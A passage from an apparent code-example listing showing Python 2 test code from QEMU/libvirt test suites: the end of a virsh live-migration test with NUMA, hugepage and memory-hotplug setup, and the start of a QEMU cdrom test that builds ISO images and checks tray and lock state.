    if graphics_listen_addr:
        graphic.listen_addr = graphics_listen_addr

    vm_ref = params.get("vm_ref", vm.name)
    delay = int(params.get("virsh_migrate_delay", 10))
    ping_count = int(params.get("ping_count", 5))
    ping_timeout = int(params.get("ping_timeout", 10))
    status_error = params.get("status_error", 'no')
    libvirtd_state = params.get("virsh_migrate_libvirtd_state", 'on')
    src_state = params.get("virsh_migrate_src_state", "running")
    enable_numa = "yes" == params.get("virsh_migrate_with_numa", "no")
    enable_numa_pin = "yes" == params.get("virsh_migrate_with_numa_pin", "no")
    enable_HP = "yes" == params.get("virsh_migrate_with_HP", "no")
    enable_HP_pin = "yes" == params.get("virsh_migrate_with_HP_pin", "no")
    postcopy_cmd = params.get("virsh_postcopy_cmd", "")
    postcopy_timeout = int(params.get("postcopy_migration_timeout", "180"))
    mem_hotplug = "yes" == params.get("virsh_migrate_mem_hotplug", "no")
    # minimum memory that can be hotplugged is 256 MiB (256 * 1024 = 262144 KiB)
    mem_hotplug_size = int(params.get("virsh_migrate_hotplug_mem", "262144"))
    mem_hotplug_count = int(params.get("virsh_migrate_mem_hotplug_count", "1"))
    mem_size_unit = params.get("virsh_migrate_hotplug_mem_unit", "KiB")

    # To check Unsupported conditions for Numa scenarios
    if enable_numa_pin:
        host_numa_node = utils_misc.NumaInfo()
        host_numa_node_list = host_numa_node.online_nodes
        memory_mode = params.get("memory_mode", 'strict')
        vmxml = vm_xml.VMXML.new_from_dumpxml(vm.name)
        vcpu = vmxml.vcpu

        # To check if Host numa node available
        if (len(host_numa_node_list) == 0):
            raise error.TestNAError("No host numa node available to pin")

        # To check preferred memory mode not used for 2 numa nodes
        # if vcpu > 1, two guest Numa nodes are created in create_numa()
        if (int(vcpu) > 1) and (memory_mode == "preferred"):
            raise error.TestNAError("NUMA memory tuning in preferred mode only"
                                    " supports single node")

    # To check if Hugepage supported and configure
    if enable_HP or enable_HP_pin:
        try:
            hp_obj = test_setup.HugePageConfig(params)
            host_hp_size = hp_obj.get_hugepage_size()
            # libvirt xml takes HP sizes in KiB
            default_hp_unit = "KiB"
            hp_pin_nodes = int(params.get("HP_pin_node_count", "2"))
            vm_max_mem = vmxml.max_mem
            no_of_HPs = int(vm_max_mem / host_hp_size) + 1
            # setting hugepages in source machine
            if (int(utils_memory.get_num_huge_pages_free()) < no_of_HPs):
                hugepage_assign(str(no_of_HPs))
            logging.debug("Hugepage support check done on host")
        except:
            raise error.TestNAError("HP not supported/configured")

    # To check mem hotplug should not exceed maxmem
    if mem_hotplug:
        # To check memory hotplug is supported by libvirt, memory hotplug
        # support QEMU/KVM driver was added in 1.2.14 version of libvirt
        if not libvirt_version.version_compare(1, 2, 14):
            raise exceptions.TestSkipError("Memory Hotplug is not supported")

        # hotplug memory in KiB
        vmxml_backup = vm_xml.VMXML.new_from_dumpxml(vm_name)
        vm_max_dimm_slots = int(params.get("virsh_migrate_max_dimm_slots",
                                           "32"))
        vm_hotplug_mem = mem_hotplug_size * mem_hotplug_count
        vm_current_mem = int(vmxml_backup.current_mem)
        vm_max_mem = int(vmxml_backup.max_mem)
        # 256 MiB(min mem that can be hotplugged) * Max no of dimm slots
        # that can be hotplugged
        vm_max_mem_rt_limit = 256 * 1024 * vm_max_dimm_slots
        # configure Maxmem in guest xml for memory hotplug to work
        try:
            vm_max_mem_rt = int(vmxml_backup.max_mem_rt)
            if(vm_max_mem_rt <= vm_max_mem_rt_limit):
                vmxml_backup.max_mem_rt = (vm_max_mem_rt_limit +
                                           vm_max_mem)
                vmxml_backup.max_mem_rt_slots = vm_max_dimm_slots
                vmxml_backup.max_mem_rt_unit = mem_size_unit
                vmxml_backup.sync()
                vm_max_mem_rt = int(vmxml_backup.max_mem_rt)
        except LibvirtXMLNotFoundError:
            vmxml_backup.max_mem_rt = (vm_max_mem_rt_limit +
                                       vm_max_mem)
            vmxml_backup.max_mem_rt_slots = vm_max_dimm_slots
            vmxml_backup.max_mem_rt_unit = mem_size_unit
            vmxml_backup.sync()
            vm_max_mem_rt = int(vmxml_backup.max_mem_rt)
        logging.debug("Hotplug mem = %d %s" % (mem_hotplug_size,
                                               mem_size_unit))
        logging.debug("Hotplug count = %d" % mem_hotplug_count)
        logging.debug("Current mem = %d" % vm_current_mem)
        logging.debug("VM maxmem = %d" % vm_max_mem_rt)
        if((vm_current_mem + vm_hotplug_mem) > vm_max_mem_rt):
            raise exceptions.TestSkipError("Cannot hotplug memory more than"
                                           "max dimm slots supported")
        if mem_hotplug_count > vm_max_dimm_slots:
            raise exceptions.TestSkipError("Cannot hotplug memory more than"
                                           " %d times" % vm_max_dimm_slots)

    # Get expected cache state for test
    attach_scsi_disk = "yes" == params.get("attach_scsi_disk", "no")
    disk_cache = params.get("virsh_migrate_disk_cache", "none")
    params["driver_cache"] = disk_cache
    unsafe_test = False
    if options.count("unsafe") and disk_cache != "none":
        unsafe_test = True

    nfs_client = None
    seLinuxBool = None
    skip_exception = False
    exception = False
    remote_viewer_pid = None
    asynch_migration = False
    ret_migrate = True

    try:
        # Change the disk of the vm to shared disk
        libvirt.set_vm_disk(vm, params)
        # Backup the SELinux status on local host for recovering
        local_selinux_bak = params.get("selinux_status_bak")

        # Configure NFS client on remote host
        nfs_client = nfs.NFSClient(params)
        nfs_client.setup()

        logging.info("Enable virt NFS SELinux boolean on target host.")
        seLinuxBool = SELinuxBoolean(params)
        seLinuxBool.setup()

        subdriver = utils_test.get_image_info(shared_storage)['format']
        extra_attach = ("--config --driver qemu --subdriver %s --cache %s"
                        % (subdriver, disk_cache))

        # Attach a scsi device for special testcases
        if attach_scsi_disk:
            shared_dir = os.path.dirname(shared_storage)
            # This is a workaround: specifying this parameter in the config
            # file does not take effect
            params["image_name"] = "scsi_test"
            scsi_qemuImg = QemuImg(params, shared_dir, '')
            scsi_disk, _ = scsi_qemuImg.create(params)
            s_attach = virsh.attach_disk(vm_name, scsi_disk, "sdb",
                                         extra_attach, debug=True)
            if s_attach.exit_status != 0:
                logging.error("Attach another scsi disk failed.")

        # Get vcpu and memory info of guest for numa related tests
        if enable_numa:
            numa_dict_list = []
            vmxml = vm_xml.VMXML.new_from_dumpxml(vm.name)
            vcpu = vmxml.vcpu
            max_mem = vmxml.max_mem
            max_mem_unit = vmxml.max_mem_unit
            if vcpu < 1:
                raise error.TestError("%s not having even 1 vcpu"
                                      % vm.name)
            else:
                numa_dict_list = create_numa(vcpu, max_mem, max_mem_unit)
            vmxml_cpu = vm_xml.VMCPUXML()
            vmxml_cpu.xml = "<cpu><numa/></cpu>"
            logging.debug(vmxml_cpu.numa_cell)
            vmxml_cpu.numa_cell = numa_dict_list
            logging.debug(vmxml_cpu.numa_cell)
            vmxml.cpu = vmxml_cpu
            if enable_numa_pin:
                memnode_mode = []
                memnode_mode.append(params.get("memnode_mode_1", 'preferred'))
                memnode_mode.append(params.get("memnode_mode_2", 'preferred'))
                memory_dict, memnode_list = numa_pin(memory_mode, memnode_mode,
                                                     numa_dict_list,
                                                     host_numa_node_list)
                logging.debug(memory_dict)
                logging.debug(memnode_list)
                if memory_dict:
                    vmxml.numa_memory = memory_dict
                if memnode_list:
                    vmxml.numa_memnode = memnode_list

            # Hugepage enabled guest by pinning to node
            if enable_HP_pin:
                # If only one guest numa node was created (based on the
                # available vcpus) but the param asks to pin HP to 2 nodes,
                # fall back to 1 node
                if len(numa_dict_list) == 1:
                    if (hp_pin_nodes == 2):
                        hp_pin_nodes = 1
                if enable_numa_pin:
                    HP_page_list = enable_hugepage(vm_name, no_of_HPs,
                                                   hp_unit=default_hp_unit,
                                                   hp_node=hp_pin_nodes,
                                                   pin=True,
                                                   node_list=memnode_list,
                                                   host_hp_size=host_hp_size,
                                                   numa_pin=True)
                else:
                    HP_page_list = enable_hugepage(vm_name, no_of_HPs,
                                                   hp_unit=default_hp_unit,
                                                   hp_node=hp_pin_nodes,
                                                   host_hp_size=host_hp_size,
                                                   pin=True)
                vmxml_mem = vm_xml.VMMemBackingXML()
                vmxml_hp = vm_xml.VMHugepagesXML()
                pagexml_list = []
                for page in range(len(HP_page_list)):
                    pagexml = vmxml_hp.PageXML()
                    pagexml.update(HP_page_list[page])
                    pagexml_list.append(pagexml)
                vmxml_hp.pages = pagexml_list
                vmxml_mem.hugepages = vmxml_hp
                vmxml.mb = vmxml_mem
            vmxml.sync()

        # Hugepage enabled guest without pinning to node
        if enable_HP:
            if enable_numa_pin:
                # HP with Numa pin
                HP_page_list = enable_hugepage(vm_name, no_of_HPs, pin=False,
                                               node_list=memnode_list,
                                               host_hp_size=host_hp_size,
                                               numa_pin=True)
            else:
                # HP without Numa pin
                HP_page_list = enable_hugepage(vm_name, no_of_HPs)
        if not vm.is_alive():
            vm.start()

        vm.wait_for_login()

        # Perform memory hotplug after VM is up
        if mem_hotplug:
            if enable_numa:
                numa_node = '0'
                if mem_hotplug_count == 1:
                    mem_xml = create_mem_hotplug_xml(mem_hotplug_size,
                                                     mem_size_unit, numa_node)
                    logging.info("Trying to hotplug memory")
                    ret_attach = virsh.attach_device(vm_name, mem_xml,
                                                     flagstr="--live",
                                                     debug=True)
                    if ret_attach.exit_status != 0:
                        logging.error("Hotplugging memory failed")
                elif mem_hotplug_count > 1:
                    for each_count in range(mem_hotplug_count):
                        mem_xml = create_mem_hotplug_xml(mem_hotplug_size,
                                                         mem_size_unit,
                                                         numa_node)
                        logging.info("Trying to hotplug memory")
                        ret_attach = virsh.attach_device(vm_name, mem_xml,
                                                         flagstr="--live",
                                                         debug=True)
                        if ret_attach.exit_status != 0:
                            logging.error("Hotplugging memory failed")
                        # Alternate the target numa node for hotplug if
                        # there are 2 nodes
                        if len(numa_dict_list) == 2:
                            if numa_node == '0':
                                numa_node = '1'
                            else:
                                numa_node = '0'
                # check hotplugged memory is reflected
                vmxml_backup = vm_xml.VMXML.new_from_dumpxml(vm_name)
                vm_new_current_mem = int(vmxml_backup.current_mem)
                logging.debug("Old current memory %d" % vm_current_mem)
                logging.debug("Hot plug mem %d" % vm_hotplug_mem)
                logging.debug("New current memory %d" % vm_new_current_mem)
                logging.debug("old mem + hotplug = %d" % (vm_current_mem +
                                                          vm_hotplug_mem))
                if not (vm_new_current_mem == (vm_current_mem +
                                               vm_hotplug_mem)):
                    raise exceptions.TestFail("Memory hotplug failed")
                else:
                    logging.debug("Memory hotplugged successfully !!!")

        # Confirm VM can be accessed through network.
        time.sleep(delay)
        vm_ip = vm.get_address()
        logging.info("To check VM network connectivity before migrating")
        s_ping, o_ping = utils_test.ping(vm_ip, count=ping_count,
                                         timeout=ping_timeout)
        logging.info(o_ping)
        if s_ping != 0:
            raise error.TestError("%s did not respond after %d sec."
                                  % (vm.name, ping_timeout))

        # Prepare for --dname dest_exist_vm
        if extra.count("dest_exist_vm"):
            logging.debug("Preparing a new vm on destination for exist dname")
            vmxml = vm_xml.VMXML.new_from_dumpxml(vm.name)
            vmxml.vm_name = extra.split()[1].strip()
            del vmxml.uuid
            # Define a new vm on destination for --dname
            virsh.define(vmxml.xml, uri=dest_uri)

        # Prepare for --xml.
        xml_option = params.get("xml_option", "no")
        if xml_option == "yes":
            if not extra.count("--dname") and not extra.count("--xml"):
                logging.debug("Preparing new xml file for --xml option.")
                ret_attach = vm.attach_interface("--type bridge --source "
                                                 "virbr0 --target tmp-vnet",
                                                 True, True)
                if not ret_attach:
                    exception = True
                    raise error.TestError("Attaching nic to %s failed."
                                          % vm.name)
                ifaces = vm_xml.VMXML.get_net_dev(vm.name)
                new_nic_mac = vm.get_virsh_mac_address(
                    ifaces.index("tmp-vnet"))
                vmxml = vm_xml.VMXML.new_from_dumpxml(vm.name)
                logging.debug("Xml file on source:\n%s" % vm.get_xml())
                extra = ("%s --xml=%s" % (extra, vmxml.xml))
            elif extra.count("--dname"):
                vm_new_name = params.get("vm_new_name")
                vmxml = vm_xml.VMXML.new_from_dumpxml(vm.name)
                if vm_new_name:
                    logging.debug("Preparing change VM XML with a new name")
                    vmxml.vm_name = vm_new_name
                extra = ("%s --xml=%s" % (extra, vmxml.xml))

        # Turn VM into certain state.
        logging.debug("Turning %s into certain state." % vm.name)
        if src_state == "paused":
            if vm.is_alive():
                vm.pause()
        elif src_state == "shut off":
            if vm.is_alive():
                if not vm.shutdown():
                    vm.destroy()

        # Turn libvirtd into certain state.
        logging.debug("Turning libvirtd into certain status.")
        if libvirtd_state == "off":
            utils_libvirtd.libvirtd_stop()

        # Test uni-direction migration.
        logging.debug("Doing migration test.")
        if vm_ref != vm_name:
            vm.name = vm_ref    # For vm name error testing.
        if unsafe_test:
            options = "--live"

        if graphics_server:
            cmd = "%s %s" % (remote_viewer_executable, graphics_server)
            logging.info("Execute command: %s", cmd)
            ps = process.SubProcess(cmd, shell=True)
            remote_viewer_pid = ps.start()
            logging.debug("PID for process '%s': %s",
                          remote_viewer_executable, remote_viewer_pid)

        # Case for option '--timeout --timeout-suspend'
        # 1. Start the guest
        # 2. Set migration speed to a small value. Ensure the migration
        #    duration is much larger than the timeout value
        # 3. Start the migration
        # 4. When the eclipse time reaches the timeout value, check the guest
        #    state to be paused on both source host and target host
        # 5. Wait for the migration done. Check the guest state to be shutoff
        #    on source host and running on target host
        if extra.count("--timeout-suspend"):
            asynch_migration = True
            speed = int(params.get("migrate_speed", 1))
            timeout = int(params.get("timeout_before_suspend", 5))
            logging.debug("Set migration speed to %sM", speed)
            virsh.migrate_setspeed(vm_name, speed, debug=True)
            migration_test = libvirt.MigrationTest()
            migrate_options = "%s %s" % (options, extra)
            vms = [vm]
            params["vm_migration"] = vm
            migration_test.do_migration(vms, None, dest_uri, 'orderly',
                                        migrate_options, thread_timeout=900,
                                        ignore_status=True,
                                        func=check_migration_timeout_suspend,
                                        func_params=params)
            ret_migrate = migration_test.RET_MIGRATION
        if postcopy_cmd != "":
            asynch_migration = True
            vms = []
            vms.append(vm)
            obj_migration = libvirt.MigrationTest()
            migrate_options = "%s %s" % (options, extra)
            cmd = "sleep 5 && virsh %s %s" % (postcopy_cmd, vm_name)
            logging.info("Starting migration in thread")
            try:
                obj_migration.do_migration(vms, src_uri, dest_uri, "orderly",
                                           options=migrate_options,
                                           thread_timeout=postcopy_timeout,
                                           ignore_status=False,
                                           func=process.run,
                                           func_params=cmd,
                                           shell=True)
            except Exception, info:
                raise exceptions.TestFail(info)
            if obj_migration.RET_MIGRATION:
                utils_test.check_dest_vm_network(vm, vm.get_address(),
                                                 server_ip, server_user,
                                                 server_pwd)
                ret_migrate = True
            else:
                ret_migrate = False
        if not asynch_migration:
            ret_migrate = do_migration(delay, vm, dest_uri, options, extra)

        dest_state = params.get("virsh_migrate_dest_state", "running")
        if ret_migrate and dest_state == "running":
            server_session = remote.wait_for_login('ssh', server_ip, '22',
                                                   server_user, server_pwd,
                                                   r"[\#\$]\s*$")
            logging.info("Check VM network connectivity after migrating")
            s_ping, o_ping = utils_test.ping(vm_ip, count=ping_count,
                                             timeout=ping_timeout,
                                             output_func=logging.debug,
                                             session=server_session)
            logging.info(o_ping)
            if s_ping != 0:
                server_session.close()
                raise error.TestError("%s did not respond after %d sec."
                                      % (vm.name, ping_timeout))
            server_session.close()

        if graphics_server:
            logging.info("To check the process running '%s'.",
                         remote_viewer_executable)
            if process.pid_exists(int(remote_viewer_pid)) is False:
                raise error.TestFail("PID '%s' for process '%s'"
                                     " does not exist"
                                     % (remote_viewer_pid,
                                        remote_viewer_executable))
            else:
                logging.info("PID '%s' for process '%s' still exists"
                             " as expected.",
                             remote_viewer_pid,
                             remote_viewer_executable)
            logging.debug("Kill the PID '%s' running '%s'",
                          remote_viewer_pid,
                          remote_viewer_executable)
            process.kill_process_tree(int(remote_viewer_pid))

        # Check the unsafe result and maybe migrate again in the right mode
        check_unsafe_result = True
        if ret_migrate is False and unsafe_test:
            options = params.get("virsh_migrate_options")
            ret_migrate = do_migration(delay, vm, dest_uri, options, extra)
        elif ret_migrate and unsafe_test:
            check_unsafe_result = False
        if vm_ref != vm_name:
            vm.name = vm_name

        # Recover libvirtd state.
        logging.debug("Recovering libvirtd status.")
        if libvirtd_state == "off":
            utils_libvirtd.libvirtd_start()

        # Check vm state on destination.
        logging.debug("Checking %s state on target %s.", vm.name,
                      vm.connect_uri)
        if (options.count("dname") or
                extra.count("dname") and status_error != 'yes'):
            vm.name = extra.split()[1].strip()
        check_dest_state = True
        check_dest_state = check_vm_state(vm, dest_state)
        logging.info("Supposed state: %s" % dest_state)
        logging.info("Actual state: %s" % vm.state())

        # Check vm state on source.
        if extra.count("--timeout-suspend"):
            logging.debug("Checking '%s' state on source '%s'", vm.name,
                          src_uri)
            vm_state = virsh.domstate(vm.name, uri=src_uri).stdout.strip()
            if vm_state != "shut off":
                raise exceptions.TestFail("Local vm state should be 'shut off'"
                                          ", but found '%s'" % vm_state)

        # Recover VM state.
        logging.debug("Recovering %s state." % vm.name)
        if src_state == "paused":
            vm.resume()
        elif src_state == "shut off":
            vm.start()

        # Checking for --persistent.
        check_dest_persistent = True
        if options.count("persistent") or extra.count("persistent"):
            logging.debug("Checking for --persistent option.")
            if not vm.is_persistent():
                check_dest_persistent = False

        # Checking for --undefinesource.
        check_src_undefine = True
        if options.count("undefinesource") or extra.count("undefinesource"):
            logging.debug("Checking for --undefinesource option.")
            logging.info("Verifying <virsh domstate> DOES return an error."
                         "%s should not exist on %s." % (vm_name, src_uri))
            if virsh.domain_exists(vm_name, uri=src_uri):
                check_src_undefine = False

        # Checking for --dname.
        check_dest_dname = True
        if (options.count("dname") or extra.count("dname") and
                status_error != 'yes'):
            logging.debug("Checking for --dname option.")
            dname = extra.split()[1].strip()
            if not virsh.domain_exists(dname, uri=dest_uri):
                check_dest_dname = False

        # Checking for --xml.
        check_dest_xml = True
        if (xml_option == "yes" and not extra.count("--dname") and
                not extra.count("--xml")):
            logging.debug("Checking for --xml option.")
            vm_dest_xml = vm.get_xml()
            logging.info("Xml file on destination: %s" % vm_dest_xml)
            if not re.search(new_nic_mac, vm_dest_xml):
                check_dest_xml = False

    except exceptions.TestSkipError, detail:
        skip_exception = True
    except Exception, detail:
        exception = True
        logging.error("%s: %s" % (detail.__class__, detail))

    # Whatever error occurs, we have to clean up all environment.
    # Make sure vm.connect_uri is the destination uri.
    vm.connect_uri = dest_uri
    if (options.count("dname") or extra.count("dname") and
            status_error != 'yes'):
        # Use the VM object to remove
        vm.name = extra.split()[1].strip()
        cleanup_dest(vm, src_uri)
        vm.name = vm_name
    else:
        cleanup_dest(vm, src_uri)

    # Recover source (just in case).
    # A simple sync cannot be used here, because the vm may not exist and
    # that would cause the sync to fail during the internal backup.
    vm.destroy()
    vm.undefine()
    orig_config_xml.define()

    # cleanup xml created during memory hotplug test
    if mem_hotplug:
        if os.path.isfile(mem_xml):
            data_dir.clean_tmp_files()
            logging.debug("Cleanup mem hotplug xml")

    # cleanup hugepages
    if enable_HP or enable_HP_pin:
        logging.info("Cleanup Hugepages")
        # cleaning source hugepages
        hugepage_assign("0")
        # cleaning destination hugepages
        hugepage_assign(
            "0", target_ip=server_ip, user=server_user, password=server_pwd)

    if attach_scsi_disk:
        libvirt.delete_local_disk("file", path=scsi_disk)

    if seLinuxBool:
        logging.info("Recover virt NFS SELinux boolean on target host...")
        # keep .ssh/authorized_keys for NFS cleanup later
        seLinuxBool.cleanup(True)

    if nfs_client:
        logging.info("Cleanup NFS client environment...")
        nfs_client.cleanup()

    logging.info("Remove the NFS image...")
    source_file = params.get("source_file")
    libvirt.delete_local_disk("file", path=source_file)

    logging.info("Cleanup NFS server environment...")
    exp_dir = params.get("export_dir")
    mount_dir = params.get("mnt_path_name")
    libvirt.setup_or_cleanup_nfs(False, export_dir=exp_dir,
                                 mount_dir=mount_dir,
                                 restore_selinux=local_selinux_bak)
    if skip_exception:
        raise exceptions.TestSkipError(detail)
    if exception:
        raise error.TestError(
            "Error occurred. \n%s: %s" % (detail.__class__, detail))

    # Check test result.
    if status_error == 'yes':
        if ret_migrate:
            raise error.TestFail("Migration finished with unexpected status.")
    else:
        if not ret_migrate:
            raise error.TestFail("Migration finished with unexpected status.")
        if not check_dest_state:
            raise error.TestFail("Wrong VM state on destination.")
        if not check_dest_persistent:
            raise error.TestFail("VM is not persistent on destination.")
        if not check_src_undefine:
            raise error.TestFail("VM is not undefined on source.")
        if not check_dest_dname:
            raise error.TestFail("Wrong VM name %s on destination." % dname)
        if not check_dest_xml:
            raise error.TestFail("Wrong xml configuration on destination.")
        if not check_unsafe_result:
            raise error.TestFail("Migration finished in unsafe mode.")

Example 7

Project: tp-qemu
Source File: cdrom.py
View license
@error.context_aware
def run(test, params, env):
    """
    KVM cdrom test:

    1) Boot up a VM, with one iso image (optional).
    2) Check if VM identifies correctly the iso file.
    3) Verifies that device is unlocked <300s after boot (optional, if
       cdrom_test_autounlock is set).
    4) Eject cdrom using monitor.
    5) Change cdrom image with another iso several times.
    6) Test tray reporting function (optional, if cdrom_test_tray_status is set)
    7) Try to format cdrom and check the return string.
    8) Mount cdrom device.
    9) Copy file from cdrom and compare files.
    10) Umount and mount cdrom in guest several times.
    11) Check if the cdrom lock works well when no iso file is inserted.
    12) Reboot vm after vm resumes from s3/s4.
        Note: This case requires a qemu command line that does not set the
        file property for the -drive option, and will be separated into a
        different cfg item.

    :param test: kvm test object
    :param params: Dictionary with the test parameters
    :param env: Dictionary with test environment.

    :param cfg: workaround_eject_time - Some versions of qemu are unable to
                                        eject CDROM directly after insert
    :param cfg: cdrom_test_autounlock - Test whether guest OS unlocks cdrom
                                        after boot (<300s after VM is booted)
    :param cfg: cdrom_test_tray_status - Test tray reporting (eject and insert
                                         CD couple of times in guest).
    :param cfg: cdrom_test_locked -     Test whether cdrom tray lock function
                                        work well in guest.
    :param cfg: cdrom_test_eject -      Test whether cdrom works well after
                                        several times of eject action.
    :param cfg: cdrom_test_file_operation - Test file operation for cdrom,
                                            such as mount/umount, reading files
                                            on cdrom.

    @warning: Check dmesg for block device failures
    """
    # Some versions of qemu are unable to eject CDROM directly after insert
    workaround_eject_time = float(params.get('workaround_eject_time', 0))

    login_timeout = int(params.get("login_timeout", 360))
    cdrom_prepare_timeout = int(params.get("cdrom_preapre_timeout", 360))

    def generate_serial_num():
        length = int(params.get("length", "10"))
        id_leng = random.randint(6, length)
        ignore_str = ",!\"#$%&\'()*+./:;<=>?@[\\]^`{|}~"
        return utils_misc.generate_random_string(id_leng, ignore_str)

    def list_guest_cdroms(session):
        """
        Get cdrom lists from guest os;

        :param session: ShellSession object;
        :return: list of cdrom device names found in the guest;
        :rtype: list
        """
        list_cdrom_cmd = "wmic cdrom get Drive"
        filter_cdrom_re = "\w:"
        if params["os_type"] != "windows":
            list_cdrom_cmd = "ls /dev/cdrom*"
            filter_cdrom_re = r"/dev/cdrom-\w+|/dev/cdrom\d*"
        output = session.cmd_output(list_cdrom_cmd)
        cdroms = re.findall(filter_cdrom_re, output)
        cdroms.sort()
        return cdroms

    def get_cdrom_mount_point(session, drive_letter, params):
        """
        Get default cdrom mount point;
        """
        mount_point = "/mnt"
        if params["os_type"] == "windows":
            cmd = "wmic volume where DriveLetter='%s' " % drive_letter
            cmd += "get DeviceID | more +1"
            mount_point = session.cmd_output(cmd).strip()
        return mount_point

    @error.context_aware
    def create_iso_image(params, name, prepare=True, file_size=None):
        """
        Creates 'new' iso image with one file on it

        :param params: parameters for test
        :param name: name of new iso image file
        :param prepare: if True, create and populate the iso image.
        :param file_size: Size of iso image in MB

        :return: path to new iso image file.
        """
        error.context("Creating test iso image '%s'" % name, logging.info)
        cdrom_cd = params["target_cdrom"]
        cdrom_cd = params[cdrom_cd]
        if not os.path.isabs(cdrom_cd):
            cdrom_cd = utils_misc.get_path(data_dir.get_data_dir(), cdrom_cd)
        iso_image_dir = os.path.dirname(cdrom_cd)
        if file_size is None:
            file_size = 10
        g_mount_point = tempfile.mkdtemp("gluster")
        image_params = params.object_params(name)
        if image_params.get("enable_gluster") == "yes":
            if params.get("gluster_server"):
                gluster_server = params.get("gluster_server")
            else:
                gluster_server = "localhost"
            volume_name = params["gluster_volume_name"]
            g_mount_link = "%s:/%s" % (gluster_server, volume_name)
            mount_cmd = "mount -t glusterfs %s %s" % (g_mount_link, g_mount_point)
            utils.system(mount_cmd, timeout=60)
            file_name = os.path.join(g_mount_point, "%s.iso" % name)
        else:
            file_name = utils_misc.get_path(iso_image_dir, "%s.iso" % name)
        if prepare:
            cmd = "dd if=/dev/urandom of=%s bs=1M count=%d"
            utils.run(cmd % (name, file_size))
            utils.run("mkisofs -o %s %s" % (file_name, name))
            utils.run("rm -rf %s" % (name))
        if image_params.get("enable_gluster") == "yes":
            gluster_uri = gluster.create_gluster_uri(image_params)
            file_name = "%s%s.iso" % (gluster_uri, name)
            try:
                umount_cmd = "umount %s" % g_mount_point
                utils.system(umount_cmd, timeout=60)
                os.rmdir(g_mount_point)
            except Exception, err:
                msg = "Failed to clean up %s. " % g_mount_point
                msg += "Error message: %s" % err
                logging.warn(msg)
        return file_name

    def cleanup_cdrom(path):
        """ Removes created iso image """
        if path:
            error.context("Cleaning up temp iso image '%s'" % path,
                          logging.info)
            if "gluster" in path:
                g_mount_point = tempfile.mkdtemp("gluster")
                g_server, v_name, f_name = path.split("/")[-3:]
                if ":" in g_server:
                    g_server = g_server.split(":")[0]
                g_mount_link = "%s:/%s" % (g_server, v_name)
                mount_cmd = "mount -t glusterfs %s %s" % (g_mount_link,
                                                          g_mount_point)
                utils.system(mount_cmd, timeout=60)
                path = os.path.join(g_mount_point, f_name)
            try:
                logging.debug("Remove the file with os.remove().")
                os.remove("%s" % path)
            except OSError, err:
                logging.warn("Failed to delete %s: %s" % (path, err))
            if "gluster" in path:
                try:
                    umount_cmd = "umount %s" % g_mount_point
                    utils.system(umount_cmd, timeout=60)
                    os.rmdir(g_mount_point)
                except Exception, err:
                    msg = "Failed to clean up %s. " % g_mount_point
                    msg += "Error message: %s" % err
                    logging.warn(msg)

    def get_cdrom_file(vm, qemu_cdrom_device):
        """
        :param vm: VM object
        :param qemu_cdrom_device: qemu monitor device
        :return: file associated with $qemu_cdrom_device device
        """
        blocks = vm.monitor.info("block")
        cdfile = None
        if isinstance(blocks, str):
            tmp_re_str = r'%s: .*file=(\S*) ' % qemu_cdrom_device
            file_list = re.findall(tmp_re_str, blocks)
            if file_list:
                cdfile = file_list[0]
            else:
                # try to deal with new qemu
                tmp_re_str = r'%s: (\S*) \(.*\)' % qemu_cdrom_device
                file_list = re.findall(tmp_re_str, blocks)
                if file_list:
                    cdfile = file_list[0]
        else:
            for block in blocks:
                if block['device'] == qemu_cdrom_device:
                    try:
                        cdfile = block['inserted']['file']
                        break
                    except KeyError:
                        continue
        return cdfile

    def _get_tray_stat_via_monitor(vm, qemu_cdrom_device):
        """
        Get the cdrom tray status via qemu monitor
        """
        is_open, checked = (None, False)

        blocks = vm.monitor.info("block")
        if isinstance(blocks, str):
            for block in blocks.splitlines():
                if qemu_cdrom_device in block:
                    if "tray-open=1" in block:
                        is_open, checked = (True, True)
                    elif "tray-open=0" in block:
                        is_open, checked = (False, True)
            # fallback to new qemu
            tmp_block = ""
            for block_new in blocks.splitlines():
                if tmp_block and "Removable device" in block_new:
                    if "tray open" in block_new:
                        is_open, checked = (True, True)
                    elif "tray closed" in block_new:
                        is_open, checked = (False, True)
                if qemu_cdrom_device in block_new:
                    tmp_block = block_new
                else:
                    tmp_block = ""
        else:
            for block in blocks:
                if block['device'] == qemu_cdrom_device:
                    key = filter(lambda x: re.match(r"tray.*open", x),
                                 block.keys())
                    # compatible rhel6 and rhel7 diff qmp output
                    if not key:
                        break
                    is_open, checked = (block[key[0]], True)
        return (is_open, checked)

    def is_tray_opened(vm, qemu_cdrom_device, mode='monitor',
                       dev_name="/dev/sr0"):
        """
        Checks whether the tray is opened

        :param vm: VM object
        :param qemu_cdrom_device: qemu monitor device name.
        :param mode: tray status checking mode, now supported:
                     "monitor": get tray status from monitor.
                     "session": get tray status from guest os.
                     "mixed": get tray status from monitor first; if that
                              fails, fall back to the guest os.
        :param dev_name: cdrom device name in guest os.

        :return: True if cdrom tray is open, otherwise False.
                 None if failed to get the tray status.
        """
        is_open, checked = (None, False)

        if mode in ['monitor', 'mixed']:
            is_open, checked = _get_tray_stat_via_monitor(
                vm, qemu_cdrom_device)

        if (mode in ['session', 'mixed']) and not checked:
            session = vm.wait_for_login(timeout=login_timeout)
            tray_cmd = params["tray_check_cmd"] % dev_name
            o = session.cmd_output(tray_cmd)
            if "cdrom is open" in o:
                is_open, checked = (True, True)
            else:
                is_open, checked = (False, True)
        if checked:
            return is_open
        return None

    @error.context_aware
    def check_cdrom_lock(vm, cdrom):
        """
        Checks whether the cdrom is locked

        :param vm: VM object
        :param cdrom: cdrom object

        :return: True if locked, False if unlocked, None if unknown
        """
        error.context("Check cdrom lock state.")
        blocks = vm.monitor.info("block")
        if isinstance(blocks, str):
            for block in blocks.splitlines():
                if cdrom in block:
                    if "locked=1" in block:
                        return True
                    elif "locked=0" in block:
                        return False
            # deal with new qemu
            lock_str_new = "locked"
            no_lock_str = "not locked"
            tmp_block = ""
            for block_new in blocks.splitlines():
                if tmp_block and "Removable device" in block_new:
                    if no_lock_str in block_new:
                        return False
                    elif lock_str_new in block_new:
                        return True
                if cdrom in block_new:
                    tmp_block = block_new
                else:
                    tmp_block = ""
        else:
            for block in blocks:
                if block['device'] == cdrom and 'locked' in block.keys():
                    return block['locked']
        return None

    @error.context_aware
    def get_device(vm, dev_file_path):
        """
        Get vm device class from device path.

        :param vm: VM object.
        :param dev_file_path: Device file path.
        :return: device object
        """
        error.context("Get cdrom device object")
        device = vm.get_block({'file': dev_file_path})
        if not device:
            device = vm.get_block({'backing_file': dev_file_path})
            if not device:
                raise error.TestFail("Could not find a valid cdrom device")
        return device

